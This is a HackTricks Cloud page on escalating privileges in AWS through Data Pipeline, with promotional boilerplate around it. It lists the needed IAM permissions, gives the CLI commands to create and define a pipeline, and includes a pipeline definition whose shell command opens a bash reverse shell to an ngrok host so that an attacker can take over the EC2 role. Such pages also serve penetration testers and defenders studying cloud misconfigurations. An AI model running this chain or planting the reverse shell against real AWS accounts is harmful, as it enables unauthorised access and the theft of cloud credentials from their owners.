AWS - Datapipeline Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

datapipeline

For more info about datapipeline check:

pageAWS - DataPipeline, CodePipeline & CodeCommit Enum

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`

Users with these permissions can escalate privileges by creating a Data Pipeline to execute arbitrary commands using the permissions of the assigned role:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations:

{
     "objects": [
     {
         "id" : "CreateDirectory",
         "type" : "ShellCommandActivity",
         "command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
         "runsOn" : {"ref": "instance"}
     },
     {
         "id": "Default",
         "scheduleType": "ondemand",
         "failureAndRerunMode": "CASCADE",
         "name": "Default",
         "role": "assumable_datapipeline",
         "resourceRole": "assumable_datapipeline"
     },
     {
         "id" : "instance",
         "name" : "instance",
         "type" : "Ec2Resource",
         "actionOnTaskFailure" : "terminate",
         "actionOnResourceFailure" : "retryAll",
         "maximumRetries" : "1",
         "instanceType" : "t2.micro",
         "securityGroups" : ["default"],
         "role" : "assumable_datapipeline",
         "resourceRole" : "assumable_ec2_profile_instance"
     }]
}

Note that the role in line 14, 15 and 27 needs to be a role assumable by datapipeline.amazonaws.com and the role in line 28 needs to be a role assumable by ec2.amazonaws.com with a EC2 profile instance.

Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one).

aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
    --pipeline-definition file:///pipeline/definition.json

The pipeline definition file, crafted by the attacker, includes directives to execute commands or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges.

Potential Impact: Direct privesc to the ec2 service role specified.

References

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Cognito Privesc NextAWS - Directory Services Privesc

Last updated 2 months ago

datapipeline

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

References

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`